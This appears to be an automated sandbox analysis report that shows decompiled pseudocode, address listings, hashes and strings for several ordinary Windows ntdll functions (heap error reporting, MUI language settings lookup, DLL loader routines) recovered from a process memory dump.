Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 61656ce011b99d4e23576b0794869aac9222518e309b4688691a4ded5badb6ff
Instruction ID: 16f31827bd9c2f136791897348884d05d5996d80d5095e9863774f270f0a5300
Opcode Fuzzy Hash: 61656ce011b99d4e23576b0794869aac9222518e309b4688691a4ded5badb6ff
Instruction Fuzzy Hash: FC61283B690664DFC201EBC5D485E35B7A4EB08972B99802FF80AAF311D6749C929F0D

Uniqueness

Uniqueness Score: -1.00%

Function 03433D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E03433D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E03431B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E03431B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E03431B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E03431B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E03431B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L03444620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0346F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E03471370(_t276, 0x3404e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0346BB40(0,  &_v68, _t170);
									if(L034343C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0346BB40(_t257,  &_v68, _t243);
								if(L034343C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E03471370(_t278, 0x3404e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L03444620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0346F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E03471370(_v16, 0x3404e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0346BB40(_t262,  &_v68, _t244);
								if(L034343C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E03471370(_t282, 0x3404e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0346BB40(_t262,  &_v68, _t201);
							if(L034343C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L03444620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0346F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E03471370(_t280, 0x3404e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0346BB40(_t267,  &_v68, _t245);
							if(L034343C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E03471370(_t284, 0x3404e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0346BB40(_t267,  &_v68, _t224);
						if(L034343C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x03433d3c
0x03433d42
0x03433d44
0x03433d46
0x03433d49
0x03433d4c
0x03433d4f
0x03433d52
0x03433d55
0x03433d58
0x03433d5b
0x03433d5f
0x03433d61
0x03433d66
0x03488213
0x03488218
0x03434085
0x03434088
0x0343408e
0x03434094
0x0343409a
0x034340a0
0x034340a6
0x034340a9
0x034340af
0x034340b6
0x034340bd
0x034340bd
0x03433d83
0x0348821f
0x03488229
0x03488238
0x03488238
0x0348823d
0x0348823d
0x03433da0
0x03433daf
0x03433db5
0x03433dba
0x03433dba
0x03433dd4
0x03433e94
0x03433eab
0x03433f6d
0x03433f84
0x0343406b
0x0343406b
0x0343406e
0x0343406e
0x03434070
0x03434074
0x03488351
0x03488351
0x0343407a
0x0343407f
0x0348835d
0x03488370
0x03488377
0x03488379
0x0348837c
0x0348837c
0x0348835d
0x00000000
0x0343407f
0x03433f8a
0x03433f8d
0x03433f90
0x03433f95
0x0348830d
0x0348830f
0x03433f9b
0x03433fac
0x03433fae
0x03433fb1
0x03433fb1
0x03433fb6
0x03488317
0x0348831a
0x00000000
0x03433fbc
0x03433fc1
0x03433fc9
0x03433fd7
0x03433fda
0x03433fdd
0x03434021
0x03434021
0x03434029
0x03434030
0x03434044
0x03434046
0x03434046
0x03434044
0x03434049
0x03488327
0x03488334
0x03488339
0x0348833c
0x0343404f
0x0343404f
0x0343404f
0x03434051
0x03434056
0x03434063
0x03434063
0x03434068
0x00000000
0x03434068
0x03433fdf
0x03433fe2
0x03433fe4
0x03433fe7
0x03433fef
0x03434003
0x03434005
0x03434005
0x0343400c
0x03434013
0x03434016
0x03434017
0x0343401b
0x0343401e
0x00000000
0x0343401e
0x03433fb6
0x03433eb1
0x03433eb4
0x03433eb7
0x03433ebc
0x034882a9
0x034882ab
0x03433ec2
0x03433ed3
0x03433ed5
0x03433ed8
0x03433ed8
0x03433edd
0x034882b3
0x034882b6
0x00000000
0x03433ee3
0x03433ee8
0x03433eed
0x03433ef0
0x03433ef3
0x03433f02
0x03433f05
0x03433f08
0x034882c0
0x034882c3
0x034882c5
0x034882c8
0x034882d0
0x034882e4
0x034882e6
0x034882e6
0x034882ed
0x034882f4
0x034882f7
0x034882f8
0x034882fc
0x034882ff
0x034882ff
0x03433f0e
0x03433f11
0x03433f16
0x03433f1d
0x03433f31
0x03488307
0x03488307
0x03433f31
0x03433f39
0x03433f48
0x03433f4d
0x03433f50
0x03433f50
0x03433f53
0x03433f58
0x03433f65
0x03433f65
0x03433f6a
0x00000000
0x03433f6a
0x03433edd
0x03433dda
0x03433ddd
0x03433de0
0x03433de5
0x03488245
0x03433deb
0x03433df7
0x03433dfc
0x03433dfe
0x03433e01
0x03433e01
0x03433e06
0x0348824d
0x0348824f
0x03488254
0x00000000
0x03433e0c
0x03433e11
0x03433e16
0x03433e19
0x03433e29
0x03433e2c
0x03433e2f
0x0348825c
0x0348825f
0x03488261
0x03488264
0x0348826c
0x03488280
0x03488282
0x03488282
0x03488289
0x03488290
0x03488293
0x03488294
0x03488298
0x0348829b
0x0348829b
0x03433e35
0x03433e38
0x03433e3d
0x03433e44
0x03433e58
0x034882a3
0x034882a3
0x03433e58
0x03433e60
0x03433e6f
0x03433e74
0x03433e77
0x03433e77
0x03433e7a
0x03433e7f
0x03433e8c
0x03433e8c
0x03433e91
0x00000000
0x03433e91

Strings

Kernel-MUI-Language-SKU, xrefs: 03433F70
WindowsExcludedProcs, xrefs: 03433D6F
Kernel-MUI-Number-Allowed, xrefs: 03433D8C
Kernel-MUI-Language-Allowed, xrefs: 03433DC0
Kernel-MUI-Language-Disallowed, xrefs: 03433E97

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 660e8d4305884147336bce28f4463f05b84c628d6c98d7128829ecb8bf9ea15c
Instruction ID: b1f437decc5d62c37c1693a0c41caa225017db22d37f23b56bf4022cc196b9ff
Opcode Fuzzy Hash: 660e8d4305884147336bce28f4463f05b84c628d6c98d7128829ecb8bf9ea15c
Instruction Fuzzy Hash: 2AF12A76D00219EFCB11DF9AC980AEEBBB9EF49650F54006BE515AF350D7349E01CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 03458E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E03458E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x351d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x3518464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x3515780 & 0x00000003) != 0) {
							E034A5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x3515780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0346B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x3517984; // 0xc035b0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x3518464; // 0x74790110
					 *0x351b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E03459B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x3515780 & 0x00000005) != 0) {
						_push(_t49);
						E034A5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x03458e0f
0x03458e16
0x03458e19
0x03458e1b
0x03458e21
0x03458e7f
0x03458e85
0x03499354
0x0349936c
0x03499371
0x0349937b
0x03499381
0x03499381
0x0349937b
0x03458e9d
0x03458e9d
0x03458e29
0x03458e2c
0x03458e38
0x03458e3e
0x03458e43
0x03458eb5
0x03458eb9
0x034992aa
0x034992af
0x034992e8
0x034992e8
0x034992af
0x03458eb9
0x03458e45
0x03458e53
0x03458e5b
0x03458e5f
0x03458e78
0x03458e78
0x03458e7d
0x03458ec3
0x03458ecd
0x03458ed2
0x03458ed2
0x03458ec5
0x03458ec5
0x00000000
0x03458e7d
0x03458e67
0x03458ea4
0x0349931a
0x00000000
0x00000000
0x03499320
0x03458ea4
0x03458e70
0x03499325
0x03499340
0x03499345
0x03499345
0x03458e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Querying the active activation context failed with status 0x%08lx, xrefs: 03499357
minkernel\ntdll\ldrsnap.c, xrefs: 0349933B, 03499367
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0349932A
LdrpFindDllActivationContext, xrefs: 03499331, 0349935D

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 79546ca95393924c8d0a97e35ee885d2182c214102dd18a80e41a50fc7c08a60
Instruction ID: 682ad670d4288359ccfcde8afc3630e6c2523a362b9282c2fb09f08e3fa9a50f
Opcode Fuzzy Hash: 79546ca95393924c8d0a97e35ee885d2182c214102dd18a80e41a50fc7c08a60
Instruction Fuzzy Hash: 2D41F822F803159EDB35EB458849A37B6B4A745244F0D456BFC14DF262EFB06C81C68B

Uniqueness

Uniqueness Score: -1.00%

Function 03438794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E03438794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0343934A() != 0) {
								_t159 = E034AA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x3515780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E034A5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x3515780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0343849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E03438999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E03438999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x3515c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x3515c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E03442280(_t92, 0x35186cc);
															_t94 = E034F9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E034561A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x3515c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E03438A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x3515c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x3515c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0346F380(_t136, 0x3401184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E03442280(_t108, 0x35186cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E034561A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E034F9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0343FFB0(_t118, _t156, 0x35186cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E03469A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x03438799
0x0343879d
0x034387a1
0x034387a3
0x034387a8
0x034387c3
0x034387c3
0x034387c8
0x034387d1
0x034387d4
0x034387d8
0x034387e5
0x034387ec
0x03489bfe
0x03489c00
0x03489c02
0x03489c08
0x03489c0d
0x03489c0f
0x03489c14
0x03489c2d
0x03489c32
0x03489c37
0x03489c3a
0x03489c3c
0x03489c42
0x03489c42
0x03489c3c
0x03489c02
0x034387da
0x034387df
0x034387e3
0x00000000
0x00000000
0x034387e3
0x034387f2
0x00000000
0x034387fb
0x034387fd
0x034387fe
0x0343880e
0x0343880f
0x03438810
0x03438814
0x0343881a
0x0343881c
0x0343881f
0x03438821
0x03438822
0x03438824
0x03438826
0x0343882c
0x0343882e
0x03489c48
0x03489c48
0x03438834
0x03438834
0x03438837
0x00000000
0x00000000
0x03438837
0x0343882e
0x0343883d
0x03438840
0x03438843
0x03438846
0x03438849
0x0343884c
0x0343884e
0x03438850
0x03438852
0x03438854
0x03438857
0x034388b4
0x034388b6
0x034388b6
0x03438859
0x03438859
0x03438859
0x03438861
0x03438866
0x0343886a
0x0343893d
0x03438941
0x00000000
0x03438947
0x03438947
0x0343894a
0x0343894c
0x00000000
0x03438952
0x03438955
0x0343895a
0x0343895d
0x0343895d
0x0343895f
0x03438961
0x03438961
0x03438968
0x00000000
0x00000000
0x0343896a
0x0343896b
0x0343896e
0x00000000
0x03438970
0x03438970
0x03438970
0x03438970
0x03438972
0x03438972
0x03438974
0x00000000
0x0343897a
0x0343897a
0x0343897d
0x00000000
0x03438983
0x03489c65
0x03489c6d
0x03489c72
0x03489c75
0x03489c75
0x03489c82
0x03489c86
0x03489c87
0x03489c88
0x03489c89
0x03489c8c
0x03489c90
0x03489c95
0x03489c97
0x03489ca0
0x03489ca3
0x03489ca9
0x03489ca9
0x00000000
0x03489ca9
0x03489ca3
0x00000000
0x03489c97
0x0343897d
0x00000000
0x03438974
0x03438988
0x03438992
0x03438996
0x00000000
0x03438996
0x0343894c
0x00000000
0x03438870
0x0343887b
0x0343887d
0x0343887f
0x03438881
0x03438884
0x03438884
0x03438886
0x03438889
0x0343888c
0x0343888e
0x03438891
0x03438891
0x03438898
0x00000000
0x00000000
0x0343889a
0x0343889b
0x0343889e
0x00000000
0x00000000
0x034388a0
0x034388a8
0x034388b0
0x034388b2
0x034388d3
0x034388d5
0x00000000
0x034388d7
0x034388db
0x034388dc
0x034388e0
0x034388e8
0x034388ee
0x034388f0
0x034388f3
0x034388fc
0x03438901
0x03438906
0x0343890c
0x0343890c
0x0343890f
0x03438916
0x03438917
0x03438918
0x03438919
0x0343891a
0x0343891f
0x03438921
0x03489c52
0x03489c55
0x03489c5b
0x03489cac
0x03489cc0
0x03489cc0
0x03489c55
0x03438927
0x03438927
0x0343892f
0x03438933
0x00000000
0x034388f5
0x034388f5
0x00000000
0x034388f7
0x034388f7
0x034388fa
0x00000000
0x00000000
0x00000000
0x00000000
0x034388fa
0x034388f5
0x034388f3
0x00000000
0x034388d5
0x00000000
0x034388b2
0x034388c9
0x00000000
0x034388c9
0x0343887f
0x0343886a
0x03438857
0x03438852
0x034388bf
0x034388bf
0x034387aa
0x034387ad
0x034387ae
0x034387b4
0x034387b5
0x034387b6
0x034387b8
0x034387bd
0x034387c1
0x034387f4
0x034387fa
0x00000000
0x00000000
0x00000000
0x034387c1
0x00000000

Strings

LdrpDoPostSnapWork, xrefs: 03489C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 03489C18
minkernel\ntdll\ldrsnap.c, xrefs: 03489C28

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

